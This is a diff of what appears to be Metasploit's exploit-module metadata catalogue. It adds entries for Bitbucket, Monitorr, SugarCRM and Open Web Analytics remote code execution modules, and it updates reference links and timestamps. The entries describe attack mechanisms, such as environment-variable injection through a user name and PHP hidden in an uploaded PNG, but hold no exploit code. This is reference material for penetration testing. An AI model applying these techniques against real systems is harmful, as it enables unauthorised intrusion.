+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/mysql/mysql_yassl_getname": {
    "name": "MySQL yaSSL CertDecoder::GetName Buffer Overflow",
    "fullname": "exploit/linux/mysql/mysql_yassl_getname",
@@ -79163,7 +79595,7 @@
      "BID-37943",
      "BID-37974",
      "OSVDB-61956",
-      "URL-http://secunia.com/advisories/38344/"
+      "URL-http://web.archive.org/web/20100129041727/http://secunia.com:80/advisories/38344/"
    ],
    "platform": "Linux",
    "arch": "",
@@ -79178,7 +79610,7 @@
      "Automatic",
      "Debian 5.0 - MySQL (5.0.51a-24+lenny2)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/linux/mysql/mysql_yassl_getname.rb",
    "is_install_path": true,
    "ref_name": "linux/mysql/mysql_yassl_getname",
@@ -79607,7 +80039,7 @@
      "Linux SPARC64",
      "Linux s390x"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-03-05 14:30:47 +0000",
    "path": "/modules/exploits/linux/samba/is_known_pipename.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/is_known_pipename",
@@ -85746,6 +86178,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/bitbucket_env_var_rce": {
+    "name": "Bitbucket Environment Variable RCE",
+    "fullname": "exploit/multi/http/bitbucket_env_var_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ry0taK",
+      "y4er",
+      "Shelby Pace"
+    ],
+    "description": "For various versions of Bitbucket, there is an authenticated command injection\n          vulnerability that can be exploited by injecting environment\n          variables into a user name. This module achieves remote code execution\n          as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment\n          variable, a null character as a delimiter, and arbitrary code into a user's\n          user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable\n          will be run once the Bitbucket application is coerced into generating a diff.\n\n          This module requires at least admin credentials, as admins and above\n          only have the option to change their user name.",
+    "references": [
+      "URL-https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/",
+      "URL-https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html",
+      "CVE-2022-43781"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 7990,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command",
+      "Linux Dropper",
+      "Windows Dropper"
+    ],
+    "mod_time": "2023-03-15 11:18:03 +0000",
+    "path": "/modules/exploits/multi/http/bitbucket_env_var_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/bitbucket_env_var_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/bolt_file_upload": {
    "name": "CMS Bolt File Upload Vulnerability",
    "fullname": "exploit/multi/http/bolt_file_upload",
@@ -86875,7 +87372,7 @@
    "description": "This module exploits a vulnerability in Eaton Network Shutdown Module\n        version <= 3.21, in lib/dbtools.inc which uses unsanitized user input\n        inside a eval() call. Additionally the base64 encoded user credentials\n        are extracted from the database of the application. Please note that\n        in order to be able to steal credentials, the vulnerable service must\n        have at least one USV module (an entry in the \"nodes\" table in\n        mgedb.db)",
    "references": [
      "OSVDB-83199",
-      "URL-http://secunia.com/advisories/49103/"
+      "URL-http://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/"
    ],
    "platform": "Linux,PHP",
    "arch": "php",
@@ -86899,7 +87396,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/http/eaton_nsm_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/eaton_nsm_code_exec",
@@ -89498,7 +89995,7 @@
    "references": [
      "CVE-2011-0518",
      "OSVDB-75095",
-      "URL-http://secunia.com/secunia_research/2011-21/"
+      "URL-http://web.archive.org/web/20110322161808/http://secunia.com:80/secunia_research/2011-21"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -89521,7 +90018,7 @@
    "targets": [
      "Automatic LotusCMS 3.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/http/lcms_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/lcms_php_exec",
@@ -90817,6 +91314,75 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/monitorr_webshell_rce_cve_2020_28871": {
+    "name": "Monitorr unauthenticated Remote Code Execution (RCE)",
+    "fullname": "exploit/multi/http/monitorr_webshell_rce_cve_2020_28871",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-16",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Lyhins Lab"
+    ],
+    "description": "This module exploits an arbitrary file upload vulnerability and achieving an RCE in the Monitorr application.\n          Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.\n          Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges\n          under which the web services run (typically user www-data).\n          Monitorr 1.7.6m, 1.7.7d and below are affected.",
+    "references": [
+      "CVE-2020-28871",
+      "URL-https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/",
+      "URL-https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871",
+      "EDB-48980",
+      "PACKETSTORM-163263",
+      "PACKETSTORM-170974"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "cmd, php, x64, x86",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows EXE Dropper"
+    ],
+    "mod_time": "2023-03-22 12:50:11 +0000",
+    "path": "/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/monitorr_webshell_rce_cve_2020_28871",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/monstra_fileupload_exec": {
    "name": "Monstra CMS Authenticated Arbitrary File Upload",
    "fullname": "exploit/multi/http/monstra_fileupload_exec",
@@ -91749,7 +92315,7 @@
    "references": [
      "CVE-2012-0261",
      "OSVDB-78064",
-      "URL-http://secunia.com/advisories/47417/"
+      "URL-http://web.archive.org/web/20140724161718/http://secunia.com/advisories/47417/"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -91772,7 +92338,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/http/op5_license.rb",
    "is_install_path": true,
    "ref_name": "multi/http/op5_license",
@@ -91800,7 +92366,7 @@
    "references": [
      "CVE-2012-0262",
      "OSVDB-78065",
-      "URL-http://secunia.com/advisories/47417/"
+      "URL-http://web.archive.org/web/20120114164329/http://secunia.com:80/advisories/47417"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -91823,7 +92389,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/http/op5_welcome.rb",
    "is_install_path": true,
    "ref_name": "multi/http/op5_welcome",
@@ -91835,6 +92401,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/open_web_analytics_rce": {
+    "name": "Open Web Analytics 1.7.3 - Remote Code Execution (RCE)",
+    "fullname": "exploit/multi/http/open_web_analytics_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-03-18",
+    "type": "exploit",
+    "author": [
+      "Jacob Ebben",
+      "Dennis Pfleger"
+    ],
+    "description": "Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive\n          user information, which can be used to gain admin privileges by leveraging cache hashes.\n          This occurs because files generated with '<?php (instead of the intended \"<?php sequence) aren't handled\n          by the PHP interpreter.",
+    "references": [
+      "CVE-2022-24637",
+      "EDB-51026",
+      "URL-https://devel0pment.de/?p=2494"
+    ],
+    "platform": "PHP",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-03-16 18:07:28 +0000",
+    "path": "/modules/exploits/multi/http/open_web_analytics_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/open_web_analytics_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs",
+        "account-lockouts",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/openfire_auth_bypass": {
    "name": "Openfire Admin Console Authentication Bypass",
    "fullname": "exploit/multi/http/openfire_auth_bypass",
@@ -92561,13 +93191,13 @@
      "kingcope",
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
-    "description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n        an argument injection vulnerability.  This module takes advantage of\n        the -d flag to set php.ini directives to achieve code execution.\n        From the advisory: \"if there is NO unescaped '=' in the query string,\n        the string is split on '+' (encoded space) characters, urldecoded,\n        passed to a function that escapes shell metacharacters (the \"encoded in\n        a system-defined manner\" from the RFC) and then passes them to the CGI\n        binary.\" This module can also be used to exploit the plesk 0day disclosed\n        by kingcope and exploited in the wild on June 2013.",
+    "description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n          an argument injection vulnerability.  This module takes advantage of\n          the -d flag to set php.ini directives to achieve code execution.\n\n          From the advisory: \"if there is NO unescaped '=' in the query string,\n          the string is split on '+' (encoded space) characters, urldecoded,\n          passed to a function that escapes shell metacharacters (the \"encoded in\n          a system-defined manner\" from the RFC) and then passes them to the CGI\n          binary.\" This module can also be used to exploit the plesk 0day disclosed\n          by kingcope and exploited in the wild on June 2013.",
    "references": [
      "CVE-2012-1823",
      "OSVDB-81633",
      "OSVDB-93979",
      "EDB-25986",
-      "URL-http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/",
+      "URL-http://web.archive.org/web/20120503154724/http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/",
      "URL-http://kb.parallels.com/en/116241"
    ],
    "platform": "PHP",
@@ -92591,7 +93221,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-27 15:21:04 +0000",
    "path": "/modules/exploits/multi/http/php_cgi_arg_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/php_cgi_arg_injection",
@@ -92599,6 +93229,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -94668,8 +95307,8 @@
      "CVE-2011-3833",
      "OSVDB-76999",
      "OSVDB-77003",
-      "URL-http://secunia.com/secunia_research/2011-75/",
-      "URL-http://secunia.com/secunia_research/2011-79/"
+      "URL-http://web.archive.org/web/20111202001019/http://secunia.com:80/secunia_research/2011-75",
+      "URL-http://web.archive.org/web/20120105104613/http://secunia.com/secunia_research/2011-79/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -94692,7 +95331,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/http/sit_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/sit_file_upload",
@@ -94856,7 +95495,7 @@
      "x86/x64 Windows CmdStager",
      "Windows Exec"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-26 22:02:08 +0000",
    "path": "/modules/exploits/multi/http/solr_velocity_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/solr_velocity_rce",
@@ -94864,6 +95503,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -96223,6 +96871,73 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/sugarcrm_webshell_cve_2023_22952": {
+    "name": "SugarCRM unauthenticated Remote Code Execution (RCE)",
+    "fullname": "exploit/multi/http/sugarcrm_webshell_cve_2023_22952",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-12-28",
+    "type": "exploit",
+    "author": [
+      "Sw33t.0day",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n          Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n          Serve versions prior to 12.0.2.\n\n          The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n          embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n          /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n          the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n          gaining access to the system.\n\n          This vulnerability does not require authentication because there is a missing authentication check in the\n          loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n          destroyed and hence the attacker can continue to send valid requests to the application.\n\n          Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n          access to the underlying operating system as the user that the web services are running as (typically www-data).",
+    "references": [
+      "CVE-2023-22952",
+      "URL-https://seclists.org/fulldisclosure/2022/Dec/31",
+      "URL-https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/",
+      "URL-https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update",
+      "URL-https://attackerkb.com/topics/E486ui94II/cve-2023-22952",
+      "PACKETSTORM-170346"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "cmd, php, x64, x86",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-03-07 18:15:07 +0000",
+    "path": "/modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/sugarcrm_webshell_cve_2023_22952",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/sun_jsws_dav_options": {
    "name": "Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",
    "fullname": "exploit/multi/http/sun_jsws_dav_options",
@@ -98999,7 +99714,7 @@
    "description": "This module exploits the CnC web panel of Zemra Botnet which contains a backdoor\n        inside its leaked source code. Zemra is a crimeware bot that can be used to\n        conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.",
    "references": [
      "URL-http://0day.today/exploit/19259",
-      "URL-http://insecurety.net/?p=144",
+      "URL-https://web.archive.org/web/20140207114942/http://insecurety.net/?p=144",
      "URL-http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot"
    ],
    "platform": "Unix,Windows",
@@ -99024,7 +99739,7 @@
      "zemra panel / Unix",
      "zemra panel / Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-04-01 05:17:02 +0000",
    "path": "/modules/exploits/multi/http/zemra_panel_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/zemra_panel_rce",
@@ -100197,7 +100912,7 @@
    "description": "This module abuses the \"RunScript\" procedure provided by the SOAP interface of\n        Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).\n\n        The exploit drops the payload on the server and must be removed manually.",
    "references": [
      "OSVDB-87548",
-      "URL-http://secunia.com/advisories/48572/"
+      "URL-http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/"
    ],
    "platform": "OSX,Windows",
    "arch": "",
@@ -100221,7 +100936,7 @@
      "Indesign CS6 Server / Windows (64 bits)",
      "Indesign CS6 Server / Mac OS X Snow Leopard 64 bits"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/multi/misc/indesign_server_soap.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/indesign_server_soap",
@@ -101467,7 +102182,8 @@
    "author": [
      "Jang",
      "Y4er",
-      "Shelby Pace"
+      "Shelby Pace",
+      "Steve Embling"
    ],
    "description": "There exists a Java object deserialization vulnerability\n          in multiple versions of WebLogic.\n\n          Unauthenticated remote code execution can be achieved\n          by sending a serialized BadAttributeValueExpException object\n          over the T3 protocol to vulnerable WebLogic servers.",
    "references": [
@@ -101488,7 +102204,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-04-06 11:43:50 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattrval",
@@ -101496,6 +102212,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -106245,10 +106970,11 @@
      "Vadim Melihow",
      "xistence <xistence@0x90.nl>"
    ],
-    "description": "This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.\n          Any unauthenticated client can leverage these commands to copy files from any\n          part of the filesystem to a chosen destination. The copy commands are executed with\n          the rights of the ProFTPD service, which by default runs under the privileges of the\n          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website\n          directory, PHP remote code execution is made possible.",
+    "description": "This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.\n          Any unauthenticated client can leverage these commands to copy files from any\n          part of the filesystem to a chosen destination. The copy commands are executed with\n          the rights of the ProFTPD service, which by default runs under the privileges of the\n          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website\n          directory, PHP remote code execution is made possible.",
    "references": [
      "CVE-2015-3306",
-      "EDB-36742"
+      "EDB-36742",
+      "URL-http://bugs.proftpd.org/show_bug.cgi?id=4169"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -106271,7 +106997,7 @@
    "targets": [
      "ProFTPD 1.3.5"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-19 15:35:36 +0000",
    "path": "/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/ftp/proftpd_modcopy_exec",
@@ -106279,9 +107005,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
-    "needs_cleanup": null
+    "needs_cleanup": true
  },
  "exploit_unix/ftp/vsftpd_234_backdoor": {
    "name": "VSFTPD v2.3.4 Backdoor Command Execution",
@@ -107018,7 +107754,8 @@
    "description": "pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to\n          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected\n          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.",
    "references": [
      "CVE-2022-31814",
-      "URL-https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/"
+      "URL-https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/",
+      "EDB-51032"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -107042,7 +107779,7 @@
      "Unix Command",
      "BSD Dropper"
    ],
-    "mod_time": "2022-10-24 14:17:21 +0000",
+    "mod_time": "2023-03-06 14:32:01 +0000",
    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
@@ -107523,7 +108260,7 @@
    "references": [
      "CVE-2014-5073",
      "OSVDB-109572",
-      "URL-http://secunia.com/secunia_research/2014-8/"
+      "URL-http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -107547,7 +108284,7 @@
      "Unix CMD",
      "VMTurbo Operations Manager"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "unix/http/vmturbo_vmtadmin_exec_noauth",
@@ -111687,7 +112424,7 @@
    "references": [
      "OSVDB-76111",
      "BID-49993",
-      "SECUNIA-46300",
+      "URL-http://web.archive.org/web/20121010011259/http://secunia.com/advisories/46300/",
      "URL-http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/"
    ],
    "platform": "PHP",
@@ -111711,7 +112448,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/unix/webapp/mybb_backdoor.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/mybb_backdoor",
@@ -113953,7 +114690,7 @@
      "CVE-2006-4602",
      "OSVDB-28456",
      "BID-19819",
-      "URL-http://secunia.com/advisories/21733/"
+      "URL-http://web.archive.org/web/20061013183145/http://secunia.com:80/advisories/21733/"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -113976,7 +114713,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/tikiwiki_jhot_exec",
@@ -114838,7 +115575,7 @@
    "description": "This module exploits a remote file inclusion flaw in the WordPress blogging\n        software plugin known as Advanced Custom Fields. The vulnerability allows for remote\n        file inclusion and remote code execution via the export.php script. The Advanced\n        Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only\n        works when the php option allow_url_include is set to On (Default Off).",
    "references": [
      "OSVDB-87353",
-      "URL-http://secunia.com/advisories/51037/",
+      "URL-http://web.archive.org/web/20121223025326/http://secunia.com:80/advisories/51037",
      "WPVDB-6103"
    ],
    "platform": "PHP",
@@ -114862,7 +115599,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_advanced_custom_fields_exec",
@@ -115253,7 +115990,7 @@
    "references": [
      "CVE-2012-4915",
      "OSVDB-88891",
-      "URL-http://secunia.com/advisories/50832",
+      "URL-http://web.archive.org/web/20130119141940/http://secunia.com/advisories/50832/",
      "WPVDB-6073"
    ],
    "platform": "PHP",
@@ -115277,7 +116014,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-04-01 14:17:28 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_google_document_embedder_exec",
@@ -119309,7 +120046,7 @@
      "URL-http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx",
      "URL-http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html",
      "URL-http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html",
-      "URL-http://secunia.com/blog/210"
+      "URL-http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -119328,7 +120065,7 @@
      "IE 7 on Windows Vista",
      "IE 8 on Windows 7"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flashplayer_flash10o",
@@ -120213,7 +120950,7 @@
      "CVE-2010-1799",
      "OSVDB-66636",
      "BID-41962",
-      "URL-http://secunia.com/advisories/40729/",
+      "URL-http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729",
      "URL-http://support.apple.com/kb/HT4290"
    ],
    "platform": "Windows",
@@ -120228,7 +120965,7 @@
    "targets": [
      "Apple QuickTime Player 7.6.6"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/apple_quicktime_smil_debug",
@@ -120999,7 +121736,7 @@
      "CVE-2012-0284",
      "OSVDB-84309",
      "BID-54588",
-      "URL-http://secunia.com/secunia_research/2012-25/"
+      "URL-http://web.archive.org/web/20120808000045/http://secunia.com:80/secunia_research/2012-25/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -121019,7 +121756,7 @@
      "IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
      "IE 9 with Java 6 on Windows 7 SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/cisco_playerpt_setsource_surl",
@@ -121704,7 +122441,7 @@
      "OSVDB-89030",
      "BID-57174",
      "EDB-23944",
-      "URL-http://secunia.com/advisories/51733/"
+      "URL-http://web.archive.org/web/20130113203143/http://secunia.com/advisories/51733/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -121719,7 +122456,7 @@
      "Automatic",
      "Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/foxit_reader_plugin_url_bof",
@@ -121794,7 +122531,7 @@
    "references": [
      "CVE-2007-5779",
      "OSVDB-38282",
-      "URL-http://secunia.com/advisories/27418/"
+      "URL-http://web.archive.org/web/20071030001455/http://secunia.com:80/advisories/27418/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -121808,7 +122545,7 @@
    "targets": [
      "Windows XP SP2 Pro English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/gom_openurl.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/gom_openurl",
@@ -122914,7 +123651,7 @@
      "CVE-2010-5193",
      "OSVDB-78102",
      "EDB-15668",
-      "URL-http://secunia.com/advisories/42445/",
+      "URL-http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445",
      "URL-http://xforce.iss.net/xforce/xfdb/63666"
    ],
    "platform": "Windows",
